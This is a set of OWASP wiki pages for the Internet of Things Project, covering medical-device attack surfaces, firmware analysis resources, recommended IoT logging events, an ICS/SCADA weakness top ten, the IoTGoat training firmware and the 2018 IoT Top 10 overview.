== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
== ICS/SCADA ==<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248540OWASP Internet of Things Project2019-03-08T01:37:51Z<p>Aaron.guzman: /* Collaboration */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
